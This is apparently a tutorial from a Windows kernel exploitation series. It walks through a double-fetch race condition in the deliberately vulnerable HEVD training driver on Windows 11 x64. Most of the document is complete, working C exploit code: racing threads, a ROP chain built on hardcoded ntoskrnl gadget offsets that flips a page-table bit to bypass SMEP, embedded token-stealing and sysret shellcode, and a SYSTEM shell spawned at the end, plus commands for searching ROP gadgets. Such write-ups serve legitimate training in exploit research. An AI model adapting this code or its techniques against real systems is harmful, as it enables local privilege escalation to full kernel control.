0x08 - Modern Windows Kernel Race Conditions
With Windows 7 (x86) conquered we can proceed to attempt exploitation in Windows 11 (x64).
Let’s jump in.
Table of Contents
Reverse Engineering
Let’s take a look at the vulnerable handler as well as respective structures used by the handler function.
Next, let’s look at TriggerDoubleFetch()
where the Double Fetch vulnerability is located.
We can see that our controlled input is referenced two different times, just as before, which means we should be able to trigger the race condition in the same manner as before, more specifically the double fetch! Let’s bust out a PoC!
PoC
With all that information (plus our experience in Windows 7) we can go ahead and craft a PoC.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>
#include <processthreadsapi.h>
/* IOCTL code handed to DeviceIoControl() to reach the driver's double fetch handler */
#define DOUBLE_FETCH_IOCTL 0x222037
/* Number of threads started for EACH role (worker and racer), i.e. 2 * NUM_THREADS in total */
#define NUM_THREADS 5
/* Size in bytes of the userland exploit buffer; also the oversized Size value the racer threads write */
#define BUFFER 0x1000
/* Request layout sent to the driver with DOUBLE_FETCH_IOCTL:
   a pointer to the userland data followed by the length claimed for it. */
typedef struct _DOUBLE_FETCH
{
    void     *Buffer; /* userland source buffer */
    uint64_t  Size;   /* length value the threads race on */
} DOUBLE_FETCH, *PDOUBLE_FETCH;
/* Argument bundle passed to every worker and racer thread.
   All threads receive the same instance, so they share one request object. */
typedef struct _IRP_ARGS
{
    HANDLE        hHEVD;        /* open handle to the driver, used for DeviceIoControl() */
    PDOUBLE_FETCH pDoubleFetch; /* request whose Size field the threads fight over */
} IRP_ARGS, *PIRP_ARGS;
/* CheckWin():
   Simple function to check if we're running as SYSTEM.

   Returns 0 when GetUserNameA() reports exactly "SYSTEM", and -1 otherwise
   (including when the name cannot be queried or the buffer cannot be allocated). */
int CheckWin(VOID)
{
    int win = -1;
    DWORD dwLen = 0;
    CHAR *cUsername = NULL;

    /* Size query: with a NULL buffer the call only fills in the length it needs */
    GetUserNameA(NULL, &dwLen);
    if (dwLen == 0) {
        printf("[-] Failed to allocate buffer for username check\n");
        return -1;
    }

    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
    if (cUsername == NULL) {
        printf("[-] Failed to allocate buffer for username check\n");
        return -1;
    }

    /* Only compare when the name was actually written; on failure the buffer
       is uninitialized and strcmp() would read indeterminate bytes. */
    if (GetUserNameA(cUsername, &dwLen)) {
        win = (strcmp(cUsername, "SYSTEM") == 0) ? 0 : -1;
    }

    free(cUsername);
    return win;
}
/* TriggerRaceCondition():
   Since the driver reads from userland twice, this thread keeps overwriting the Size field of the
   shared request with BUFFER, hoping the change lands between the driver's two reads.
   It never returns on its own; Exploit() terminates it. */
DWORD WINAPI TriggerRaceCondition(LPVOID lpParameters)
{
    PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;
    /* volatile: nothing in this loop reads Size back, so without it an optimizing
       compiler is free to collapse the repeated store into a single one. */
    volatile uint64_t *pSize = &pIrpArgs->pDoubleFetch->Size;

    while (1) {
        *pSize = BUFFER;
    }
    return 0;
}
/* TriggerWorkingCondition():
   As we saw in TriggerDoubleFetch(), in order to reach the RtlCopyMemory() (aka wrapper for memcpy()) we need
   our buffer to be under the sizeof(KernelBuffer). This thread keeps resetting Size to 0x10 and sending
   the IOCTL so that the request meets that condition. It never returns on its own; Exploit() terminates it. */
DWORD WINAPI TriggerWorkingCondition(LPVOID lpParameters)
{
    DWORD dwBytesReturned = 0;
    PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;

    /* Size is a uint64_t and cannot be passed to "%x" as-is (the values used in this
       program fit in 32 bits); "%p" likewise expects a void pointer. */
    printf("\t[*] Spraying DoubleFetchObject(s): %p, Size: 0x%x\n", (void *)pIrpArgs->pDoubleFetch,
           (unsigned int)pIrpArgs->pDoubleFetch->Size);

    while (1)
    {
        pIrpArgs->pDoubleFetch->Size = 0x10;
        /* Result deliberately ignored: the request is simply re-sent on the next iteration */
        DeviceIoControl(pIrpArgs->hHEVD,
                        DOUBLE_FETCH_IOCTL,
                        pIrpArgs->pDoubleFetch,
                        sizeof(DOUBLE_FETCH),
                        NULL,
                        0x00,
                        &dwBytesReturned,
                        NULL);
    }
    return 0;
}
/* GenerateExploitBuffer():
   Fill the whole BUFFER-byte region at lpvBuffer with the 64-bit marker 0x4141414141414141,
   so the overwritten return address is easy to recognise. */
void GenerateExploitBuffer(LPVOID lpvBuffer)
{
    uint64_t *qwords = (uint64_t *)lpvBuffer;
    const size_t count = BUFFER / sizeof(uint64_t);
    size_t idx = 0;

    while (idx < count)
    {
        qwords[idx] = 0x4141414141414141;
        idx++;
    }
}
/* Exploit():
   Double Fetch. Allocates and fills the exploit buffer, builds the shared request,
   starts NUM_THREADS worker/racer thread pairs, lets them run for up to 10 seconds,
   terminates them and reports the result.

   hHEVD: open handle to the driver.
   Returns CheckWin()'s result (0 when running as SYSTEM, -1 otherwise), or -1 when
   setup fails. */
int Exploit(HANDLE hHEVD)
{
    int i = 0;
    int iThreadsStarted = 1;
    LPVOID lpvMemoryAllocation = NULL;
    HANDLE hThreadWork[NUM_THREADS] = { 0 };
    HANDLE hThreadRace[NUM_THREADS] = { 0 };
    PIRP_ARGS pIrpArgs = (PIRP_ARGS)malloc(sizeof(IRP_ARGS));
    PDOUBLE_FETCH pDoubleFetchObject = (PDOUBLE_FETCH)malloc(sizeof(DOUBLE_FETCH));

    /* Both objects are dereferenced below, so bail out before touching them */
    if (pIrpArgs == NULL || pDoubleFetchObject == NULL)
    {
        printf("[-] Failed to allocate thread arguments\n");
        free(pIrpArgs);
        free(pDoubleFetchObject);
        return -1;
    }

    lpvMemoryAllocation = VirtualAlloc(NULL,
                                       BUFFER,
                                       (MEM_COMMIT | MEM_RESERVE),
                                       PAGE_EXECUTE_READWRITE);
    if (lpvMemoryAllocation == NULL)
    {
        printf("[-] Failed to allocate exploitation buffer\n");
        free(pIrpArgs);
        free(pDoubleFetchObject);
        return -1;
    }
    printf("[*] Successfully allocated exploitation buffer\n");

    /* Fill up the buffer */
    GenerateExploitBuffer(lpvMemoryAllocation);

    /* Setup the Double Fetch object */
    pDoubleFetchObject->Buffer = lpvMemoryAllocation;
    pDoubleFetchObject->Size = 0;

    /* Setup the base IRP argument(s) */
    pIrpArgs->hHEVD = hHEVD;
    pIrpArgs->pDoubleFetch = pDoubleFetchObject;

    /* Start the race!! */
    printf("[*] Off to the races\n");
    for (i = 0; i < NUM_THREADS; i++)
    {
        hThreadWork[i] = CreateThread(NULL, 0, TriggerWorkingCondition, pIrpArgs, 0, NULL);
        hThreadRace[i] = CreateThread(NULL, 0, TriggerRaceCondition, pIrpArgs, 0, NULL);
        if (hThreadWork[i] == NULL || hThreadRace[i] == NULL)
        {
            printf("[-] Failed to create thread\n");
            iThreadsStarted = 0;
            break;
        }
    }

    /* The worker threads loop forever, so this wait acts as a 10 second time limit.
       It is skipped when a handle is missing because the wait would fail immediately. */
    if (iThreadsStarted)
    {
        WaitForMultipleObjects(NUM_THREADS, hThreadWork, TRUE, 10000);
    }

    for (i = 0; i < NUM_THREADS; i++)
    {
        if (hThreadWork[i] != NULL)
        {
            TerminateThread(hThreadWork[i], 0);
            CloseHandle(hThreadWork[i]);
        }
        if (hThreadRace[i] != NULL)
        {
            TerminateThread(hThreadRace[i], 0);
            CloseHandle(hThreadRace[i]);
        }
    }

    /* NOTE(review): the request, the argument bundle and the exploit buffer are left
       allocated on purpose. They are shared with the threads, and termination is not
       confirmed to have completed here, so releasing them could race with a thread
       that is still running. */
    return iThreadsStarted ? CheckWin() : -1;
}
/* main():
   Open the driver's device, run the exploit and, when it reports success, start cmd.exe.
   Returns -1 when the device cannot be opened and 0 otherwise. */
int main()
{
    HANDLE hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL);

    /* CreateFileA() reports failure with INVALID_HANDLE_VALUE, never NULL */
    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    if (Exploit(hHEVD) == 0) {
        printf("[*] Exploitation successful, enjoy de shell!!\n\n");
        system("cmd.exe");
    } else {
        printf("[-] Exploitation failed, run again\n");
    }

    CloseHandle(hHEVD);
    return 0;
}
Once sent, we can see we’ve overwritten a return address and have obtained control over the instruction pointer :)
Getting Code Execution
We more than likely have more than enough room before the buffer overflow to inject a ROP chain to bypass memory protections. After seeing that the overwrite occurred at 2064 bytes we can proceed to look for gadgets.
C:\>rp-win.exe --rop=100 --va=0 --file C:\Windows\System32\ntoskrnl.exe > rop.txt
Don’t forget to convert to ascii if needed ;)
$ iconv -f utf-16 -t us-ascii//TRANSLIT rop.txt > rop_ascii.txt
Sadly, after looking at our options, we don’t see a lot of sub rsp
gadgets and even if we managed to find one.. it looks like the buffer we wrote is contaminated with additional data we did not send.
So if we can’t jump back, let’s jump forward! Since we can write “as much as we want”, let’s write our ROP chain past the return address overwrite!
Exploitation
Below is the final PoC code:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>
#include <processthreadsapi.h>
/* IOCTL code handed to DeviceIoControl() to reach the driver's double fetch handler */
#define DOUBLE_FETCH_IOCTL 0x222037
/* Number of threads started for EACH role (worker and racer), i.e. 2 * NUM_THREADS in total */
#define NUM_THREADS 5 // 10
/* Size in bytes of the userland exploit buffer; also the oversized Size value the racer threads write */
#define BUFFER 0x900
/* Byte offset into the exploit buffer at which the return address overwrite begins */
#define RETOVR 2064
/* Request layout sent to the driver with DOUBLE_FETCH_IOCTL:
   a pointer to the userland data followed by the length claimed for it. */
typedef struct _DOUBLE_FETCH
{
    void     *Buffer; /* userland source buffer */
    uint64_t  Size;   /* length value the threads race on */
} DOUBLE_FETCH, *PDOUBLE_FETCH;
/* Argument bundle passed to every worker and racer thread.
   All threads receive the same instance, so they share one request object. */
typedef struct _IRP_ARGS
{
    HANDLE        hHEVD;        /* open handle to the driver, used for DeviceIoControl() */
    PDOUBLE_FETCH pDoubleFetch; /* request whose Size field the threads fight over */
} IRP_ARGS, *PIRP_ARGS;
/* GetKernelModuleBase():
   Function used to obtain a kernel module address.

   pKernelModule: substring to look for in each loaded driver's base name.
   Returns the load address of the matching driver (the last one, if several match),
   or NULL when nothing matches or the driver list cannot be retrieved. */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
    char pcDriver[1024] = { 0 };
    LPVOID lpvTargetDriver = NULL;
    LPVOID *lpvDrivers = NULL;
    DWORD dwCB = 0;
    DWORD dwAllocated = 0;
    DWORD dwDrivers = 0;
    DWORD i = 0;

    if (pKernelModule == NULL)
        return NULL;

    /* Size query: dwCB receives the number of BYTES needed for the address array */
    EnumDeviceDrivers(NULL, 0, &dwCB);
    if (dwCB == 0)
        return NULL;

    /* dwCB is already a byte count, so it is the allocation size as-is */
    dwAllocated = dwCB;
    lpvDrivers = (LPVOID *)malloc(dwAllocated);
    if (lpvDrivers == NULL)
        return NULL;

    if (EnumDeviceDrivers(lpvDrivers, dwAllocated, &dwCB))
    {
        /* The needed size can grow between the two calls; never walk past what
           was actually allocated and filled. */
        if (dwCB > dwAllocated)
            dwCB = dwAllocated;

        dwDrivers = dwCB / sizeof(LPVOID);
        for (i = 0; i < dwDrivers; i++)
        {
            if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)) &&
                StrStrA(pcDriver, pKernelModule) != NULL)
            {
                lpvTargetDriver = lpvDrivers[i];
            }
        }
    }

    free(lpvDrivers);
    return lpvTargetDriver;
}
/* CheckWin():
   Simple function to check if we're running as SYSTEM.

   Returns 0 when GetUserNameA() reports exactly "SYSTEM", and -1 otherwise
   (including when the name cannot be queried or the buffer cannot be allocated). */
int CheckWin(VOID)
{
    int win = -1;
    DWORD dwLen = 0;
    CHAR *cUsername = NULL;

    /* Size query: with a NULL buffer the call only fills in the length it needs */
    GetUserNameA(NULL, &dwLen);
    if (dwLen == 0) {
        printf("[-] Failed to allocate buffer for username check\n");
        return -1;
    }

    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
    if (cUsername == NULL) {
        printf("[-] Failed to allocate buffer for username check\n");
        return -1;
    }

    /* Only compare when the name was actually written; on failure the buffer
       is uninitialized and strcmp() would read indeterminate bytes. */
    if (GetUserNameA(cUsername, &dwLen)) {
        win = (strcmp(cUsername, "SYSTEM") == 0) ? 0 : -1;
    }

    free(cUsername);
    return win;
}
/* TriggerRaceCondition():
   Since the driver reads from userland twice, this thread keeps overwriting the Size field of the
   shared request with BUFFER, hoping the change lands between the driver's two reads.
   It never returns on its own; Exploit() terminates it. */
DWORD WINAPI TriggerRaceCondition(LPVOID lpParameters)
{
    PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;
    /* volatile: nothing in this loop reads Size back, so without it an optimizing
       compiler is free to collapse the repeated store into a single one. */
    volatile uint64_t *pSize = &pIrpArgs->pDoubleFetch->Size;

    while (1) {
        *pSize = BUFFER;
    }
    return 0;
}
/* TriggerWorkingCondition():
   As we saw in TriggerDoubleFetch(), in order to reach the RtlCopyMemory() (aka wrapper for memcpy()) we need
   our buffer to be under the sizeof(KernelBuffer). This thread keeps resetting Size to 0x10 and sending
   the IOCTL so that the request meets that condition. It never returns on its own; Exploit() terminates it. */
DWORD WINAPI TriggerWorkingCondition(LPVOID lpParameters)
{
    DWORD dwBytesReturned = 0;
    PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters;

    /* Size is a uint64_t and cannot be passed to "%x" as-is (the values used in this
       program fit in 32 bits); "%p" likewise expects a void pointer. */
    printf("\t[!] Racing!!! Spraying Object(s): %p, Size: 0x%x\n", (void *)pIrpArgs->pDoubleFetch,
           (unsigned int)pIrpArgs->pDoubleFetch->Size);

    while (1)
    {
        pIrpArgs->pDoubleFetch->Size = 0x10;
        /* Result deliberately ignored: the request is simply re-sent on the next iteration */
        DeviceIoControl(pIrpArgs->hHEVD,
                        DOUBLE_FETCH_IOCTL,
                        pIrpArgs->pDoubleFetch,
                        sizeof(DOUBLE_FETCH),
                        NULL,
                        0x00,
                        &dwBytesReturned,
                        NULL);
    }
    return 0;
}
/* GenerateExploitBuffer():
   Generate the buffer that will overwrite the return address and grant control over the instruction pointer.

   lpvNt:     base address of nt; every gadget below is expressed as an offset from it.
   lpvBuffer: destination buffer. RETOVR bytes of padding plus 26 further qwords are written,
              so it must be at least RETOVR + 26 * sizeof(uint64_t) bytes long.
   Returns 0 on success, or (DWORD)-1 when the page for the shellcode cannot be allocated. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvBuffer)
{
    DWORD i = 0;
    LPVOID lpvShellcode = NULL;
    uint64_t nt = (uint64_t)(lpvNt);
    uint64_t *payload = (uint64_t *)(lpvBuffer);
    uint8_t sc[129] = {
        // sickle-tool -p windows/x64/kernel_token_stealer -f num (58 bytes)
        0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
        0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xb2, 0x04, 0x48, 0x8b, 0x80, 0x48, 0x04,
        0x00, 0x00, 0x48, 0x2d, 0x48, 0x04, 0x00, 0x00, 0x38, 0x90, 0x40, 0x04, 0x00, 0x00,
        0x75, 0xeb, 0x48, 0x8b, 0x90, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x91, 0xb8, 0x04,
        0x00, 0x00,
        // sickle-tool -p windows/x64/kernel_sysret -f num (71)
        0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x8b, 0x88,
        0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00,
        0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f,
        0x07 };

    /* Size comes from the array itself so the allocation and the copy cannot drift apart */
    lpvShellcode = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpvShellcode == NULL)
    {
        printf("[-] Failed to allocate memory to house shellcode\n");
        return (DWORD)-1;
    }
    RtlCopyMemory(lpvShellcode, sc, sizeof(sc));

    /* Pad everything up to the return address overwrite with the same gadget */
    for (i = 0; i < (RETOVR / sizeof(uint64_t)); i++) {
        *payload++ = nt + 0xa4ea7d; // ret
    }

    /* Prepare RDX register for later. It is subtracted from RAX below so that the
       final XOR gadget, which writes to [rbx+0x08], lands on the intended address. */
    *payload++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
    *payload++ = 0x000008;      // Set RDX to 0x08
    *payload++ = 0x000000;      // [filler]
    *payload++ = 0x000000;      // [filler]

    /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
       userland code. The setup is as follows:
       RAX -> VOID *MiGetPteAddress(
       ( RCX == PTE / Userland Code )
       );
       Once the call is complete RAX should contain the pointer to our PTE. */
    *payload++ = nt + 0x57699c;          // pop rcx ; ret
    *payload++ = (uint64_t)lpvShellcode; // *shellcode
    *payload++ = nt + 0x24aaec;          // MiGetPteAddress()

    /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to
       mark the page as a kernel page (U -> K). We can do this using XOR ;) */
    *payload++ = nt + 0x30fcf3; // sub rax, rdx ; ret
    *payload++ = nt + 0x54f344; // push rax ; pop rbx ; ret
    *payload++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
    *payload++ = 0x000004;      // Set RDX to 0x04, the mask XORed into the PTE
    *payload++ = 0x000000;      // [filler]
    *payload++ = 0x000000;      // [filler]
    *payload++ = nt + 0x3788b6; // xor [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret

    /* Now we can spray our shellcode address since SMEP and VPS should be bypassed.
       The gadget above skips 0x40 bytes and pops three registers before its ret,
       which is why several copies are written rather than one. */
    for (i = 0; i < 0xC; i++) {
        *payload++ = (uint64_t)lpvShellcode;
    }

    return 0;
}
/* Exploit():
   Double Fetch. Allocates the exploit buffer, resolves the base address of nt, fills the
   buffer, builds the shared request, starts NUM_THREADS worker/racer thread pairs, lets
   them run for up to 10 seconds, terminates them and reports the result.

   hHEVD: open handle to the driver.
   Returns CheckWin()'s result (0 when running as SYSTEM, -1 otherwise), or -1 when
   setup fails. */
int Exploit(HANDLE hHEVD)
{
    int i = 0;
    int iThreadsStarted = 1;
    LPVOID lpvNtKrnl = NULL;
    LPVOID lpvMemoryAllocation = NULL;
    HANDLE hThreadWork[NUM_THREADS] = { 0 };
    HANDLE hThreadRace[NUM_THREADS] = { 0 };
    PIRP_ARGS pIrpArgs = (PIRP_ARGS)malloc(sizeof(IRP_ARGS));
    PDOUBLE_FETCH pDoubleFetchObject = (PDOUBLE_FETCH)malloc(sizeof(DOUBLE_FETCH));

    /* Both objects are dereferenced below, so bail out before touching them */
    if (pIrpArgs == NULL || pDoubleFetchObject == NULL)
    {
        printf("[-] Failed to allocate thread arguments\n");
        free(pIrpArgs);
        free(pDoubleFetchObject);
        return -1;
    }

    lpvMemoryAllocation = VirtualAlloc(NULL,
                                       BUFFER,
                                       (MEM_COMMIT | MEM_RESERVE),
                                       PAGE_EXECUTE_READWRITE);
    if (lpvMemoryAllocation == NULL)
    {
        printf("[-] Failed to allocate exploitation buffer\n");
        free(pIrpArgs);
        free(pDoubleFetchObject);
        return -1;
    }
    printf("[*] Successfully allocated exploitation buffer\n");

    /* You already know ;) */
    lpvNtKrnl = GetKernelModuleBase("ntoskrnl");
    if (lpvNtKrnl == NULL)
    {
        printf("[-] Failed to obtain the base address of nt\n");
        /* No thread has been started yet, so everything can be released safely */
        VirtualFree(lpvMemoryAllocation, 0, MEM_RELEASE);
        free(pIrpArgs);
        free(pDoubleFetchObject);
        return -1;
    }
    printf("[*] Obtained the base address of nt: 0x%p\n", lpvNtKrnl);

    /* Fill up the buffer */
    GenerateExploitBuffer(lpvNtKrnl, lpvMemoryAllocation);

    /* Setup the Double Fetch object */
    pDoubleFetchObject->Buffer = lpvMemoryAllocation;
    pDoubleFetchObject->Size = 0;

    /* Setup the base IRP argument(s) */
    pIrpArgs->hHEVD = hHEVD;
    pIrpArgs->pDoubleFetch = pDoubleFetchObject;

    /* Start the race!! */
    printf("[*] Viol, Opr, Conspiracy Origins\n");
    for (i = 0; i < NUM_THREADS; i++)
    {
        hThreadWork[i] = CreateThread(NULL, 0, TriggerWorkingCondition, pIrpArgs, 0, NULL);
        hThreadRace[i] = CreateThread(NULL, 0, TriggerRaceCondition, pIrpArgs, 0, NULL);
        if (hThreadWork[i] == NULL || hThreadRace[i] == NULL)
        {
            printf("[-] Failed to create thread\n");
            iThreadsStarted = 0;
            break;
        }
    }

    /* The worker threads loop forever, so this wait acts as a 10 second time limit.
       It is skipped when a handle is missing because the wait would fail immediately. */
    if (iThreadsStarted)
    {
        WaitForMultipleObjects(NUM_THREADS, hThreadWork, TRUE, 10000);
    }

    for (i = 0; i < NUM_THREADS; i++)
    {
        if (hThreadWork[i] != NULL)
        {
            TerminateThread(hThreadWork[i], 0);
            CloseHandle(hThreadWork[i]);
        }
        if (hThreadRace[i] != NULL)
        {
            TerminateThread(hThreadRace[i], 0);
            CloseHandle(hThreadRace[i]);
        }
    }

    /* NOTE(review): the request, the argument bundle and the exploit buffer are left
       allocated on purpose. They are shared with the threads, and termination is not
       confirmed to have completed here, so releasing them could race with a thread
       that is still running. */
    return iThreadsStarted ? CheckWin() : -1;
}
/* main():
   Open the driver's device, run the exploit and, when it reports success, start cmd.exe.
   Returns -1 when the device cannot be opened and 0 otherwise. */
int main()
{
    HANDLE hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL);

    /* CreateFileA() reports failure with INVALID_HANDLE_VALUE, never NULL */
    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    if (Exploit(hHEVD) == 0) {
        printf("[*] We won the race!!! Enjoy de shell!!\n\n");
        system("cmd.exe");
    } else {
        printf("[-] Exploitation failed, run again\n");
    }

    CloseHandle(hHEVD);
    return 0;
}
Once sent, we have code execution: